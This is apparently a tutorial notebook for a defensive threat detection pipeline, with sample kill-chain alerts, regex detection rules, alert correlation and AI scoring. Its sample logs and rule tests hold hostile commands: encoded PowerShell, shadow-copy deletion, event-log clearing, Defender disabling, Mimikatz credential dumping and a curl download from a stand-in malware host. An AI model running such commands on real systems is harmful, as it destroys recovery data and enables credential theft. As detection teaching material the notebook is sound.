# Lab 23: Threat Detection Pipeline

Build an end-to-end threat detection pipeline with AI-powered analysis.

[![Open In Colab](https://colab.research.google.com/assets/colab-badge.svg)](https://colab.research.google.com/github/depalmar/ai_for_the_win/blob/main/notebooks/lab23_detection_pipeline.ipynb)

## Learning Objectives
- Multi-stage detection architecture
- Alert correlation and triage
- ML-based threat scoring
- Automated alert enrichment

**Next:** Lab 24 (Monitoring AI Systems)

In [ ]:
from typing import List, Dict, Optional
from dataclasses import dataclass, field
from datetime import datetime
from enum import Enum
import json

## 1. Detection Data Models

In [ ]:
class AlertSeverity(Enum):
    CRITICAL = 4
    HIGH = 3
    MEDIUM = 2
    LOW = 1


class AlertCategory(Enum):
    INITIAL_ACCESS = "Initial Access"
    EXECUTION = "Execution"
    PERSISTENCE = "Persistence"
    PRIVILEGE_ESCALATION = "Privilege Escalation"
    DEFENSE_EVASION = "Defense Evasion"
    CREDENTIAL_ACCESS = "Credential Access"
    DISCOVERY = "Discovery"
    LATERAL_MOVEMENT = "Lateral Movement"
    COLLECTION = "Collection"
    EXFILTRATION = "Exfiltration"
    COMMAND_AND_CONTROL = "Command and Control"
    IMPACT = "Impact"


@dataclass
class Alert:
    """Security alert with comprehensive metadata."""

    id: str
    timestamp: str
    title: str
    severity: AlertSeverity
    category: AlertCategory
    source: str
    host: str
    user: str
    description: str
    mitre_techniques: List[str] = field(default_factory=list)
    iocs: List[str] = field(default_factory=list)
    raw_log: str = ""
    enrichment: Dict = field(default_factory=dict)
    related_alerts: List[str] = field(default_factory=list)


@dataclass
class Detection:
    """Detection rule match with context."""

    rule_id: str
    rule_name: str
    severity: AlertSeverity
    category: AlertCategory
    matched_data: Dict
    timestamp: str
    mitre_techniques: List[str] = field(default_factory=list)
    false_positive_rate: float = 0.0


# Comprehensive sample alerts representing a full attack chain
SAMPLE_ALERTS = [
    # === INITIAL ACCESS ===
    Alert(
        id="ALT-001",
        timestamp="2024-01-15T09:15:00Z",
        title="Suspicious Email Attachment - Macro-Enabled Document",
        severity=AlertSeverity.HIGH,
        category=AlertCategory.INITIAL_ACCESS,
        source="Email Gateway",
        host="WORKSTATION-42",
        user="jsmith",
        description="User received and opened macro-enabled Office document from external sender",
        mitre_techniques=["T1566.001"],
        iocs=["invoice_q4_2024.docm", "accounting@c0mpany-invoices.com"],
        raw_log="EmailGateway: DELIVER from=accounting@c0mpany-invoices.com to=jsmith@company.com attach=invoice_q4_2024.docm",
    ),
    # === EXECUTION ===
    Alert(
        id="ALT-002",
        timestamp="2024-01-15T09:15:30Z",
        title="Office Application Spawning Shell",
        severity=AlertSeverity.CRITICAL,
        category=AlertCategory.EXECUTION,
        source="EDR",
        host="WORKSTATION-42",
        user="jsmith",
        description="WINWORD.EXE spawned cmd.exe - possible malicious macro execution",
        mitre_techniques=["T1059.001", "T1204.002"],
        iocs=["cmd.exe /c powershell -enc"],
        raw_log="Process: WINWORD.EXE (PID:4521) -> cmd.exe (PID:4622) cmdline='cmd.exe /c powershell -enc JABj...'",
    ),
    Alert(
        id="ALT-003",
        timestamp="2024-01-15T09:15:35Z",
        title="Encoded PowerShell Execution",
        severity=AlertSeverity.CRITICAL,
        category=AlertCategory.EXECUTION,
        source="EDR",
        host="WORKSTATION-42",
        user="jsmith",
        description="PowerShell with -enc parameter and hidden window detected",
        mitre_techniques=["T1059.001", "T1027"],
        iocs=["powershell.exe -nop -w hidden -enc"],
        raw_log="Process: powershell.exe cmdline='-nop -w hidden -enc JABjAGwAaQBlAG4AdAA9...' parent=cmd.exe",
    ),
    # === COMMAND AND CONTROL ===
    Alert(
        id="ALT-004",
        timestamp="2024-01-15T09:16:00Z",
        title="Cobalt Strike Beacon Detected",
        severity=AlertSeverity.CRITICAL,
        category=AlertCategory.COMMAND_AND_CONTROL,
        source="NDR",
        host="WORKSTATION-42",
        user="jsmith",
        description="HTTPS beaconing pattern to known C2 infrastructure detected",
        mitre_techniques=["T1071.001", "T1573.002"],
        iocs=["185.143.223.47:443", "60-second beacon interval"],
        raw_log="NDR: BEACON host=WORKSTATION-42 dst=185.143.223.47:443 interval=60s jitter=10% bytes=256",
    ),
    Alert(
        id="ALT-005",
        timestamp="2024-01-15T09:20:00Z",
        title="DNS Tunneling Suspected",
        severity=AlertSeverity.HIGH,
        category=AlertCategory.COMMAND_AND_CONTROL,
        source="DNS",
        host="WORKSTATION-42",
        user="jsmith",
        description="High volume of DNS TXT queries to suspicious domain",
        mitre_techniques=["T1071.004"],
        iocs=["data.evil-dns.com", "TXT queries > 100/min"],
        raw_log="DNS: host=WORKSTATION-42 query=aGVsbG8.data.evil-dns.com type=TXT count=150 period=60s",
    ),
    # === DISCOVERY ===
    Alert(
        id="ALT-006",
        timestamp="2024-01-15T09:25:00Z",
        title="Active Directory Enumeration",
        severity=AlertSeverity.MEDIUM,
        category=AlertCategory.DISCOVERY,
        source="EDR",
        host="WORKSTATION-42",
        user="jsmith",
        description="Rapid execution of AD discovery commands",
        mitre_techniques=["T1087.002", "T1069.002"],
        iocs=["net group /domain", "nltest /dclist", "dsquery computer"],
        raw_log="Process: net.exe 'group Domain Admins /domain', nltest '/dclist:company.local'",
    ),
    Alert(
        id="ALT-007",
        timestamp="2024-01-15T09:26:00Z",
        title="BloodHound Collection Detected",
        severity=AlertSeverity.HIGH,
        category=AlertCategory.DISCOVERY,
        source="EDR",
        host="WORKSTATION-42",
        user="jsmith",
        description="SharpHound collector executed for AD reconnaissance",
        mitre_techniques=["T1087.002"],
        iocs=["SharpHound.exe", "bloodhound.zip"],
        raw_log="Process: SharpHound.exe -c All -d company.local --outputdirectory C:\\Users\\jsmith\\AppData",
    ),
    # === CREDENTIAL ACCESS ===
    Alert(
        id="ALT-008",
        timestamp="2024-01-15T09:30:00Z",
        title="LSASS Memory Access",
        severity=AlertSeverity.CRITICAL,
        category=AlertCategory.CREDENTIAL_ACCESS,
        source="EDR",
        host="WORKSTATION-42",
        user="jsmith",
        description="Suspicious process accessed LSASS memory - credential theft attempt",
        mitre_techniques=["T1003.001"],
        iocs=["rundll32.exe accessing lsass.exe", "ACCESS_PROCESS_VM_READ"],
        raw_log="Sysmon Event 10: SourceImage=rundll32.exe TargetImage=lsass.exe GrantedAccess=0x1010",
    ),
    Alert(
        id="ALT-009",
        timestamp="2024-01-15T09:35:00Z",
        title="Kerberoasting Attack Detected",
        severity=AlertSeverity.HIGH,
        category=AlertCategory.CREDENTIAL_ACCESS,
        source="DC01",
        host="DC01",
        user="jsmith",
        description="Multiple TGS requests for service accounts with RC4 encryption",
        mitre_techniques=["T1558.003"],
        iocs=["svc_backup", "svc_sql", "svc_web", "RC4 encryption"],
        raw_log="Event 4769: ServiceName=svc_backup TicketEncryptionType=0x17 TicketOptions=0x40810000",
    ),
    # === LATERAL MOVEMENT ===
    Alert(
        id="ALT-010",
        timestamp="2024-01-15T09:40:00Z",
        title="PsExec Remote Execution",
        severity=AlertSeverity.HIGH,
        category=AlertCategory.LATERAL_MOVEMENT,
        source="EDR",
        host="FS01",
        user="svc_backup",
        description="PsExec service installed on remote host - lateral movement",
        mitre_techniques=["T1569.002", "T1021.002"],
        iocs=["PSEXESVC.exe", "\\\\FS01\\ADMIN$"],
        raw_log="Event 7045: ServiceName=PSEXESVC ServiceFileName=C:\\Windows\\PSEXESVC.exe",
    ),
    Alert(
        id="ALT-011",
        timestamp="2024-01-15T09:42:00Z",
        title="WMI Remote Process Creation",
        severity=AlertSeverity.HIGH,
        category=AlertCategory.LATERAL_MOVEMENT,
        source="EDR",
        host="BACKUP01",
        user="svc_backup",
        description="WMI used for remote process execution",
        mitre_techniques=["T1047"],
        iocs=["wmic /node:BACKUP01 process call create"],
        raw_log="Event 5861: Namespace=root\\cimv2 Query=SELECT * FROM Win32_Process User=svc_backup",
    ),
    Alert(
        id="ALT-012",
        timestamp="2024-01-15T09:45:00Z",
        title="RDP Connection from Server",
        severity=AlertSeverity.MEDIUM,
        category=AlertCategory.LATERAL_MOVEMENT,
        source="Windows Security",
        host="EXCH01",
        user="da_admin",
        description="RDP connection initiated from server - unusual pattern",
        mitre_techniques=["T1021.001"],
        iocs=["BACKUP01 -> EXCH01", "Type 10 logon"],
        raw_log="Event 4624: LogonType=10 SourceNetworkAddress=192.168.1.30 TargetUserName=da_admin",
    ),
    # === PRIVILEGE ESCALATION ===
    Alert(
        id="ALT-013",
        timestamp="2024-01-15T09:48:00Z",
        title="DCSync Attack Detected",
        severity=AlertSeverity.CRITICAL,
        category=AlertCategory.CREDENTIAL_ACCESS,
        source="DC01",
        host="DC01",
        user="svc_backup",
        description="Directory replication request from non-DC host",
        mitre_techniques=["T1003.006"],
        iocs=["DS-Replication-Get-Changes-All", "Source: BACKUP01"],
        raw_log="Event 4662: ObjectType=domainDNS AccessMask=0x100 Properties=DS-Replication-Get-Changes-All",
    ),
    # === DEFENSE EVASION ===
    Alert(
        id="ALT-014",
        timestamp="2024-01-15T09:50:00Z",
        title="Security Tool Disabled",
        severity=AlertSeverity.CRITICAL,
        category=AlertCategory.DEFENSE_EVASION,
        source="EDR",
        host="FS01",
        user="da_admin",
        description="Windows Defender real-time protection disabled",
        mitre_techniques=["T1562.001"],
        iocs=["Set-MpPreference -DisableRealtimeMonitoring $true"],
        raw_log="Event 5001: Windows Defender Real-Time Protection disabled User=da_admin",
    ),
    Alert(
        id="ALT-015",
        timestamp="2024-01-15T09:51:00Z",
        title="Event Log Cleared",
        severity=AlertSeverity.HIGH,
        category=AlertCategory.DEFENSE_EVASION,
        source="Windows Security",
        host="FS01",
        user="da_admin",
        description="Security event log was cleared",
        mitre_techniques=["T1070.001"],
        iocs=["wevtutil cl Security"],
        raw_log="Event 1102: The audit log was cleared. User=da_admin",
    ),
    # === EXFILTRATION ===
    Alert(
        id="ALT-016",
        timestamp="2024-01-15T09:55:00Z",
        title="Large Data Transfer to External IP",
        severity=AlertSeverity.CRITICAL,
        category=AlertCategory.EXFILTRATION,
        source="NDR",
        host="FS01",
        user="da_admin",
        description="Large volume of data transferred to external IP",
        mitre_techniques=["T1048.003", "T1567.002"],
        iocs=["45.33.32.156:443", "15GB transferred"],
        raw_log="NDR: host=FS01 dst=45.33.32.156:443 bytes_out=16106127360 duration=1800s",
    ),
    # === IMPACT ===
    Alert(
        id="ALT-017",
        timestamp="2024-01-15T10:00:00Z",
        title="Mass File Encryption Detected",
        severity=AlertSeverity.CRITICAL,
        category=AlertCategory.IMPACT,
        source="EDR",
        host="FS01",
        user="SYSTEM",
        description="Rapid file modifications with encryption patterns detected",
        mitre_techniques=["T1486"],
        iocs=["locker.exe", ".lockbit extension", "15000+ files affected"],
        raw_log="EDR: MassFileModification host=FS01 extensions=.lockbit count=15234 rate=100/sec",
    ),
    Alert(
        id="ALT-018",
        timestamp="2024-01-15T10:00:30Z",
        title="Shadow Copy Deletion",
        severity=AlertSeverity.CRITICAL,
        category=AlertCategory.IMPACT,
        source="EDR",
        host="FS01",
        user="SYSTEM",
        description="Volume shadow copies deleted - ransomware behavior",
        mitre_techniques=["T1490"],
        iocs=["vssadmin delete shadows /all /quiet"],
        raw_log="Process: vssadmin.exe 'delete shadows /all /quiet' parent=locker.exe",
    ),
    Alert(
        id="ALT-019",
        timestamp="2024-01-15T10:01:00Z",
        title="Ransom Note Created",
        severity=AlertSeverity.CRITICAL,
        category=AlertCategory.IMPACT,
        source="EDR",
        host="FS01",
        user="SYSTEM",
        description="Ransom note file created in multiple directories",
        mitre_techniques=["T1486"],
        iocs=["README.txt", "LockBit ransom note"],
        raw_log="FileCreate: path=C:\\Users\\*\\Desktop\\README.txt content_match=LockBit_ransomware",
    ),
    # === PERSISTENCE ===
    Alert(
        id="ALT-020",
        timestamp="2024-01-15T09:18:00Z",
        title="Scheduled Task Created for Persistence",
        severity=AlertSeverity.HIGH,
        category=AlertCategory.PERSISTENCE,
        source="EDR",
        host="WORKSTATION-42",
        user="jsmith",
        description="Scheduled task created to execute at system startup",
        mitre_techniques=["T1053.005"],
        iocs=["schtasks /create", "WindowsUpdate task"],
        raw_log="Event 4698: TaskName=\\Microsoft\\Windows\\WindowsUpdate TaskContent=C:\\Users\\Public\\update.exe",
    ),
]

print(f"Loaded {len(SAMPLE_ALERTS)} alerts across the kill chain")
print("\n📊 Alerts by Category:")
category_counts = {}
for alert in SAMPLE_ALERTS:
    cat = alert.category.value
    category_counts[cat] = category_counts.get(cat, 0) + 1
for cat, count in sorted(category_counts.items(), key=lambda x: -x[1]):
    print(f"   {cat}: {count}")

## 2. Detection Rule Engine

In [ ]:
import re


class DetectionRule:
    """Detection rule with comprehensive metadata."""

    def __init__(
        self,
        rule_id: str,
        name: str,
        severity: AlertSeverity,
        category: AlertCategory,
        pattern: str,
        mitre_techniques: List[str] = None,
        description: str = "",
        false_positive_guidance: str = "",
    ):
        self.rule_id = rule_id
        self.name = name
        self.severity = severity
        self.category = category
        self.pattern = pattern
        self.compiled = re.compile(pattern, re.IGNORECASE)
        self.mitre_techniques = mitre_techniques or []
        self.description = description
        self.false_positive_guidance = false_positive_guidance

    def match(self, data: str) -> Optional[Detection]:
        if self.compiled.search(data):
            return Detection(
                rule_id=self.rule_id,
                rule_name=self.name,
                severity=self.severity,
                category=self.category,
                matched_data={"input": data[:200]},
                timestamp=datetime.now().isoformat(),
                mitre_techniques=self.mitre_techniques,
            )
        return None


# Comprehensive detection rules covering the MITRE ATT&CK framework
RULES = [
    # === EXECUTION ===
    DetectionRule(
        "EXE-001",
        "Encoded PowerShell Command",
        AlertSeverity.CRITICAL,
        AlertCategory.EXECUTION,
        r"powershell.*(-enc|-encodedcommand|-e\s)",
        mitre_techniques=["T1059.001", "T1027"],
        description="Detects PowerShell with encoded command parameter",
        false_positive_guidance="May trigger on legitimate admin scripts using encoding",
    ),
    DetectionRule(
        "EXE-002",
        "Office Spawning Shell",
        AlertSeverity.CRITICAL,
        AlertCategory.EXECUTION,
        r"(winword|excel|powerpnt|outlook)\.exe.*->(cmd|powershell|wscript|mshta)",
        mitre_techniques=["T1059", "T1204.002"],
        description="Detects Office applications spawning command interpreters",
    ),
    DetectionRule(
        "EXE-003",
        "MSHTA Execution",
        AlertSeverity.HIGH,
        AlertCategory.EXECUTION,
        r"mshta\.exe.*(http|javascript|vbscript)",
        mitre_techniques=["T1218.005"],
        description="Detects MSHTA executing remote or inline scripts",
    ),
    DetectionRule(
        "EXE-004",
        "Regsvr32 Scriptlet",
        AlertSeverity.HIGH,
        AlertCategory.EXECUTION,
        r"regsvr32.*(/s\s*/i|scrobj\.dll)",
        mitre_techniques=["T1218.010"],
        description="Detects Regsvr32 COM scriptlet execution (Squiblydoo)",
    ),
    DetectionRule(
        "EXE-005",
        "WMIC Process Create",
        AlertSeverity.HIGH,
        AlertCategory.EXECUTION,
        r"wmic.*process\s+call\s+create",
        mitre_techniques=["T1047"],
        description="Detects WMI used for process creation",
    ),
    # === CREDENTIAL ACCESS ===
    DetectionRule(
        "CRD-001",
        "Mimikatz Execution",
        AlertSeverity.CRITICAL,
        AlertCategory.CREDENTIAL_ACCESS,
        r"(mimikatz|sekurlsa|kerberos::)",
        mitre_techniques=["T1003.001"],
        description="Detects Mimikatz credential theft tool",
    ),
    DetectionRule(
        "CRD-002",
        "LSASS Dump via Procdump",
        AlertSeverity.CRITICAL,
        AlertCategory.CREDENTIAL_ACCESS,
        r"procdump.*-ma\s+lsass",
        mitre_techniques=["T1003.001"],
        description="Detects LSASS memory dump via Procdump",
    ),
    DetectionRule(
        "CRD-003",
        "Comsvcs LSASS Dump",
        AlertSeverity.CRITICAL,
        AlertCategory.CREDENTIAL_ACCESS,
        r"comsvcs\.dll.*MiniDump",
        mitre_techniques=["T1003.001"],
        description="Detects LSASS dump via comsvcs.dll",
    ),
    DetectionRule(
        "CRD-004",
        "SAM Database Access",
        AlertSeverity.HIGH,
        AlertCategory.CREDENTIAL_ACCESS,
        r"(reg\s+save.*sam|copy.*\\config\\sam)",
        mitre_techniques=["T1003.002"],
        description="Detects SAM database extraction attempts",
    ),
    DetectionRule(
        "CRD-005",
        "NTDS.dit Access",
        AlertSeverity.CRITICAL,
        AlertCategory.CREDENTIAL_ACCESS,
        r"(ntdsutil|vssadmin.*create.*shadow|copy.*ntds\.dit)",
        mitre_techniques=["T1003.003"],
        description="Detects attempts to copy AD database",
    ),
    # === LATERAL MOVEMENT ===
    DetectionRule(
        "LAT-001",
        "PsExec Execution",
        AlertSeverity.HIGH,
        AlertCategory.LATERAL_MOVEMENT,
        r"(psexec|psexesvc)",
        mitre_techniques=["T1569.002", "T1021.002"],
        description="Detects PsExec remote execution tool",
    ),
    DetectionRule(
        "LAT-002",
        "Admin Share Access",
        AlertSeverity.MEDIUM,
        AlertCategory.LATERAL_MOVEMENT,
        r"\\\\[^\\]+\\(admin\$|c\$|ipc\$)",
        mitre_techniques=["T1021.002"],
        description="Detects admin share access for lateral movement",
    ),
    DetectionRule(
        "LAT-003",
        "WinRM Remote Execution",
        AlertSeverity.HIGH,
        AlertCategory.LATERAL_MOVEMENT,
        r"(winrs|invoke-command.*-computername)",
        mitre_techniques=["T1021.006"],
        description="Detects WinRM remote command execution",
    ),
    # === DEFENSE EVASION ===
    DetectionRule(
        "DEF-001",
        "Disable Windows Defender",
        AlertSeverity.CRITICAL,
        AlertCategory.DEFENSE_EVASION,
        r"set-mppreference.*-disablerealtimemonitoring",
        mitre_techniques=["T1562.001"],
        description="Detects Windows Defender being disabled",
    ),
    DetectionRule(
        "DEF-002",
        "Event Log Clear",
        AlertSeverity.HIGH,
        AlertCategory.DEFENSE_EVASION,
        r"(wevtutil\s+cl|clear-eventlog)",
        mitre_techniques=["T1070.001"],
        description="Detects Windows event log clearing",
    ),
    DetectionRule(
        "DEF-003",
        "AMSI Bypass",
        AlertSeverity.CRITICAL,
        AlertCategory.DEFENSE_EVASION,
        r"(amsiutils|amsiinitfailed|amsi\.dll)",
        mitre_techniques=["T1562.001"],
        description="Detects AMSI bypass attempts",
    ),
    DetectionRule(
        "DEF-004",
        "Timestomp Attempt",
        AlertSeverity.MEDIUM,
        AlertCategory.DEFENSE_EVASION,
        r"(timestomp|setfiletime)",
        mitre_techniques=["T1070.006"],
        description="Detects file timestamp modification",
    ),
    # === DISCOVERY ===
    DetectionRule(
        "DIS-001",
        "AD Enumeration",
        AlertSeverity.MEDIUM,
        AlertCategory.DISCOVERY,
        r"(net\s+group.*domain|nltest\s*/dclist|dsquery)",
        mitre_techniques=["T1087.002"],
        description="Detects Active Directory enumeration commands",
    ),
    DetectionRule(
        "DIS-002",
        "BloodHound/SharpHound",
        AlertSeverity.HIGH,
        AlertCategory.DISCOVERY,
        r"(sharphound|bloodhound|invoke-bloodhound)",
        mitre_techniques=["T1087.002"],
        description="Detects BloodHound AD reconnaissance tool",
    ),
    DetectionRule(
        "DIS-003",
        "Network Scanning",
        AlertSeverity.MEDIUM,
        AlertCategory.DISCOVERY,
        r"(nmap|masscan|portscan|net\s+view)",
        mitre_techniques=["T1046"],
        description="Detects network scanning activity",
    ),
    # === PERSISTENCE ===
    DetectionRule(
        "PER-001",
        "Scheduled Task Creation",
        AlertSeverity.MEDIUM,
        AlertCategory.PERSISTENCE,
        r"schtasks.*/create",
        mitre_techniques=["T1053.005"],
        description="Detects scheduled task creation for persistence",
    ),
    DetectionRule(
        "PER-002",
        "Registry Run Key",
        AlertSeverity.MEDIUM,
        AlertCategory.PERSISTENCE,
        r"reg\s+add.*(run|runonce)",
        mitre_techniques=["T1547.001"],
        description="Detects registry run key modification",
    ),
    DetectionRule(
        "PER-003",
        "Service Creation",
        AlertSeverity.MEDIUM,
        AlertCategory.PERSISTENCE,
        r"sc\s+(create|config)",
        mitre_techniques=["T1543.003"],
        description="Detects service creation for persistence",
    ),
    # === IMPACT ===
    DetectionRule(
        "IMP-001",
        "Shadow Copy Deletion",
        AlertSeverity.CRITICAL,
        AlertCategory.IMPACT,
        r"vssadmin.*delete\s+shadows",
        mitre_techniques=["T1490"],
        description="Detects shadow copy deletion (ransomware indicator)",
    ),
    DetectionRule(
        "IMP-002",
        "WMIC Shadow Delete",
        AlertSeverity.CRITICAL,
        AlertCategory.IMPACT,
        r"wmic.*shadowcopy.*delete",
        mitre_techniques=["T1490"],
        description="Detects shadow copy deletion via WMIC",
    ),
    DetectionRule(
        "IMP-003",
        "BCDEdit Recovery Disable",
        AlertSeverity.CRITICAL,
        AlertCategory.IMPACT,
        r"bcdedit.*/set.*recoveryenabled\s+no",
        mitre_techniques=["T1490"],
        description="Detects boot recovery being disabled",
    ),
    DetectionRule(
        "IMP-004",
        "Cipher Wipe",
        AlertSeverity.HIGH,
        AlertCategory.IMPACT,
        r"cipher\s*/w",
        mitre_techniques=["T1485"],
        description="Detects secure file deletion via cipher",
    ),
    # === C2 ===
    DetectionRule(
        "C2-001",
        "Suspicious Download",
        AlertSeverity.MEDIUM,
        AlertCategory.COMMAND_AND_CONTROL,
        r"(curl|wget|certutil.*-urlcache|bitsadmin.*transfer).*http",
        mitre_techniques=["T1105"],
        description="Detects file download via command line tools",
    ),
    DetectionRule(
        "C2-002",
        "PowerShell Download Cradle",
        AlertSeverity.HIGH,
        AlertCategory.COMMAND_AND_CONTROL,
        r"(invoke-webrequest|iwr|downloadstring|downloadfile)",
        mitre_techniques=["T1059.001", "T1105"],
        description="Detects PowerShell download cradles",
    ),
]

print(f"Loaded {len(RULES)} detection rules")
print("\n📋 Rules by Category:")
rule_categories = {}
for rule in RULES:
    cat = rule.category.value
    rule_categories[cat] = rule_categories.get(cat, 0) + 1
for cat, count in sorted(rule_categories.items(), key=lambda x: -x[1]):
    print(f"   {cat}: {count}")

# Test rules against sample data
print("\n🔍 Testing Rules:")
test_data = [
    "cmd.exe /c powershell -enc SGVsbG8gV29ybGQ=",
    "vssadmin delete shadows /all /quiet",
    "wmic shadowcopy delete",
    "curl http://malware.com/payload.exe -o payload.exe",
    "mimikatz.exe sekurlsa::logonpasswords",
    "net group 'Domain Admins' /domain",
    "normal user activity - safe command",
]

for data in test_data:
    matches = [rule.name for rule in RULES if rule.match(data)]
    status = f"DETECTED: {', '.join(matches)}" if matches else "clean"
    print(f"   '{data[:50]}...' -> {status}")

## 3. Alert Correlator

In [ ]:
class AlertCorrelator:
    """Correlate related alerts into incidents."""

    def __init__(self, time_window_minutes: int = 30):
        self.time_window = time_window_minutes

    def correlate(self, alerts: List[Alert]) -> List[Dict]:
        """Group alerts by host and time window."""
        # Group by host
        by_host = {}
        for alert in alerts:
            if alert.host not in by_host:
                by_host[alert.host] = []
            by_host[alert.host].append(alert)

        # Create correlated incidents
        incidents = []
        for host, host_alerts in by_host.items():
            if len(host_alerts) > 1:
                # Multiple alerts = potential incident
                max_severity = max(a.severity.value for a in host_alerts)
                techniques = set()
                for a in host_alerts:
                    techniques.update(a.mitre_techniques)

                incidents.append(
                    {
                        "incident_id": f"INC-{host}-001",
                        "host": host,
                        "alert_count": len(host_alerts),
                        "max_severity": AlertSeverity(max_severity).name,
                        "techniques": list(techniques),
                        "alerts": [a.id for a in host_alerts],
                    }
                )

        return incidents


# Correlate
correlator = AlertCorrelator()
incidents = correlator.correlate(SAMPLE_ALERTS)

print("Correlated Incidents:")
for inc in incidents:
    print(f"  {inc['incident_id']}")
    print(f"    Host: {inc['host']}")
    print(f"    Alerts: {inc['alert_count']}")
    print(f"    Max Severity: {inc['max_severity']}")
    print(f"    Techniques: {inc['techniques']}")

## 4. AI Threat Scorer

In [ ]:
class ThreatScorer:
    """AI-powered threat scoring."""

    def __init__(self):
        try:
            from anthropic import Anthropic

            self.client = Anthropic()
            self.available = True
        except:
            self.available = False

    def score_incident(self, incident: Dict, alerts: List[Alert]) -> Dict:
        """Score incident severity with AI analysis."""
        if not self.available:
            return self._mock_score(incident, alerts)

        alert_summaries = "\n".join(
            [f"- [{a.severity.name}] {a.title}: {a.description}" for a in alerts]
        )

        prompt = f"""Analyze this security incident and provide a threat score (1-100):

Host: {incident['host']}
Alert Count: {incident['alert_count']}
MITRE Techniques: {incident['techniques']}

Alerts:
{alert_summaries}

Provide:
1. Threat score (1-100)
2. Confidence level
3. Brief analysis
4. Recommended priority

Return as JSON."""

        response = self.client.messages.create(
            model="claude-sonnet-4.5",
            max_tokens=256,
            messages=[{"role": "user", "content": prompt}],
        )

        return json.loads(response.content[0].text)

    def _mock_score(self, incident: Dict, alerts: List[Alert]) -> Dict:
        score = 50 + len(alerts) * 10
        if incident["max_severity"] == "CRITICAL":
            score += 30
        return {
            "threat_score": min(100, score),
            "confidence": 0.85,
            "analysis": f"Multiple related alerts on {incident['host']} suggest active threat",
            "priority": "P1" if score >= 80 else "P2",
        }


# Score
scorer = ThreatScorer()
if incidents:
    score_result = scorer.score_incident(incidents[0], SAMPLE_ALERTS)
    print("Threat Score:")
    print(json.dumps(score_result, indent=2))

## 5. Detection Pipeline

In [ ]:
class DetectionPipeline:
    """End-to-end detection pipeline."""

    def __init__(self):
        self.rules = RULES
        self.correlator = AlertCorrelator()
        self.scorer = ThreatScorer()

    def process(self, events: List[str]) -> Dict:
        """Process events through pipeline."""
        # Stage 1: Detection
        detections = []
        for event in events:
            for rule in self.rules:
                match = rule.match(event)
                if match:
                    detections.append(match)

        # Stage 2: Alert Generation
        alerts = []
        for i, det in enumerate(detections):
            alerts.append(
                Alert(
                    id=f"ALT-{i+1:03d}",
                    timestamp=det.timestamp,
                    title=det.rule_name,
                    severity=det.severity,
                    category=det.category,
                    source="Detection Engine",
                    host="WORKSTATION-01",
                    user="unknown",
                    description=f"Rule {det.rule_id} matched",
                )
            )

        # Stage 3: Correlation
        incidents = self.correlator.correlate(alerts)

        return {"detections": len(detections), "alerts": len(alerts), "incidents": incidents}


# Test pipeline
pipeline = DetectionPipeline()

test_events = [
    "powershell.exe -enc SGVsbG8=",
    "vssadmin delete shadows /all /quiet",
    "normal user activity",
    "curl http://malware.com/payload",
]

result = pipeline.process(test_events)
print(f"Detections: {result['detections']}")
print(f"Alerts: {result['alerts']}")
print(f"Incidents: {len(result['incidents'])}")

## Summary

We built a complete threat detection pipeline:

1. **Rule Engine** - Pattern-based detection
2. **Alert Generation** - Structured alert creation
3. **Correlation** - Group related alerts
4. **AI Scoring** - Threat prioritization

### Next Steps:
1. Add Sigma rule support
2. Implement ML-based anomaly detection
3. Create real-time streaming pipeline